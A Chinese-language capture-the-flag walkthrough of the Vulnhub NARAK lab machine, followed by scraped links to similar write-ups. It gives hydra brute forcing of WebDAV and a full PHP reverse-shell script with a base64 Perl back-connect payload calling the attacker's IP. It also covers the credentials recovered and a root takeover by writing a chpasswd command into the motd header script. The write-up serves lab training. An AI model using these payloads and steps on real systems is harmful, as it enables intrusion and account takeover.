Vulnhub靶机实战-NARAK
声明
好好学习,天天向上
搭建
用vmware打开,都调成NAT或者都调成桥接
渗透
存活扫描,发现目标
arp-scan -l
端口扫描
nmap -T4 -A 192.168.31.52 -p 1-65535 -oN nmap.A
开启端口
发现开启80,22
访问80
http://192.168.31.52
看了首页,看见了地狱一样,不禁让我想起了最近的电视剧《风声》里面的地狱变
扫目录吧
python3 dirsearch.py -u 192.168.31.52
开的目录不是很多
使用cewl收集社工字典,爬虫会根据指定的URL和深度进行爬取,然后打印出可用于密码破解的字典
cewl 192.168.31.52/ -w pass.dic
访问webdav,需要密码
http://192.168.31.52/webdav/
hydra爆破一下
hydra -L pass.dic -P pass.dic 192.168.31.52 http-get /webdav
爆破出
yamdoot
Swarg
登录,还是webdav
webdav是个啥?
WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP 1.1协议的通信协议。它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。
使用cadaver对webdav进行读写,既然是读写那就和上传下载的webshell扯到一起了,思路如下:
1.kali监听6666端口
2.使用cadaver连接到webdav库
3.写好php反连脚本并上传
4.访问php
1.kali监听6666端口
nc -lvvp 6666
2.使用cadaver连接到webdav库
cadaver http://192.168.31.52/webdav
yamdoot
Swarg
3.写好php反连脚本并上传
shell.php,内容如下,自行修改反弹到kali的IP和端口
<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.31.64";
$yourport = '6666';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
准备好php后,webdav命令行执行
put shell.php
4.访问php
可以看到kali已经反弹shell,执行下面的命令进入python交互式
python3 -c 'import pty;pty.spawn("/bin/bash")'
进入home目录翻一翻,拿到user.txt,接下来需要拿root.txt了
在根目录的mnt下发现可疑脚本
接下来需要解密(brainfuck 解码)
https://www.splitbrain.org/services/ook
输入
--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.
拿到解密后的明文
chitragupt
得到用户
inferno/chitragupt
ssh登录
ssh inferno@192.168.31.52
现在我们要通过修改ssh登陆时的欢迎信息对root密码进行修改,修改的文件是00-header文件在/etc/update-motd.d目录下,执行
echo “echo ‘root:admin’ | sudo chpasswd” >> /etc/update-motd.d/00-header
显示没有权限,我就直接vi
vi /etc/update-motd.d/00-header
加入,可以保存
echo ‘root:admin’ | sudo chpasswd
重新登录inferno用户,su root刚刚更改的密码:
总结
1.信息收集
端口发现80和22
通过80,发现有webdav,使用cewl扫描页面生成社工字典
2.web权限
使用hydra对webdav进行爆破,拿到webdav的web权限
3.shell权限
拿到webdav的用户名和密码后,使用cadaver登录webdav的数据库,上传一个反弹shell脚本,web访问该脚本后,拿到shell权限
4.权限维持
拿到shell后,查阅文件,发现另一个账户的密码,使用ssh进行连接登录,拿到flag
5.提权
修改ssh的欢迎文件,加入修改root密码的脚本,再次使用ssh连接,就修改了root的密码,su到root,拿到flag
Vulnhub靶机实战-NARAK相关推荐
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- Vulnhub靶机实战——DC-8
靶机DC-8下载地址: https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Ka ...
- Vulnhub靶机实战——DC-5
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kal ...
- Vulnhub靶机实战——Matrix2
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Ma ...
- 挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:中等 工具:kalilinux: 一个灵活的脑子 : 一双手 目标:得到root权限&am ...
- 挑战全网最详细靶机教程——vulnhub靶机实战vulnhub Tr0ll: 1【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 靶机难度:简单 靶机发布日期:2014年8月14日 靶机描述:Tr0ll的灵感来自OSCP实验室中不断摇 ...
- Vulnhub靶机实战——Matrix3
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192 ...
- Vulnhub靶机实战——DC-3
靶机DC-3下载地址:https : //download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https : //download.vulnhub.co ...
- DC-5 vulnhub靶机实战
首先是使用virtualbox安装,这里不推荐vmware,会出很多问题. nmap扫一下子网,看靶机的ip地址: 发现ip是192.168.240.137,开放了80和111端口. 给了提示是个文件 ...
最新文章
- SPOJ - BITDIFF: Bit Difference [神妙の预处理]
- 软件工程学完java后干_软件工程学习后的一些体会--------两周
- Intellj(IDEA) warning no artifacts configured
- java 什么是迭代器
- RandomizedLogisticRegression ImportError解决思路参考
- Base64的编码实现原理攻略
- 引入外部机构需要注意的事项_如何与外部营销机构合作
- JQuery点击收起,点击展开以及部分非空小验证
- 在Simulink中设计多工位的系列PID控制器Design Family of PID Controllers for Multiple Operating Points
- C#编码简单性之泛型篇(如何编写简短的C#代码,随时更新)
- Django 的 之 视图
- 使用IntelliJ IDEA开发Spring MVC HelloWorld
- 使用标准测试函数测试全套 MATLAB 优化算法
- Read timed out executing GET (读取执行GET超时)
- syntax error: unexpected :=解决方案
- 怎样裁剪GIF动态图片?教你一键在线完成GIF裁剪
- kindeditor自定义添加网络视频插件,修改批量图片上传方式flash为h5
- 格子玻尔兹曼机(Lattice Boltzmann Method)系列4:LBM实例之方腔驱动流
- XML与Json解析
- 高能同步辐射光源基建攻克首个难关
热门文章
- java assertthat_assertThat使用方法
- 云原生之使用Docker部署OneNav个人书签管理器
- 苹果电脑如何使用pc键盘?
- nuxt3 引入高德地图
- 洛谷 P2053 [SCOI2007]修车 网络流 最小费用最大流 Dinic+Spfa
- shiro原理/流程(前后端不分离)
- linux exfat分区格式化,如何在 Linux 上将 USB 盘格式化为 exFAT | Linux 中国
- 汇聚能量,元气弹发射 | PingCAP Special Week - Tools matter 有感
- 在线 OJ 项目(二) · 操作数据库 · 设计前后端交互的 API · 实现在线编译运行功能
- 流行的表达式引擎简单分析对比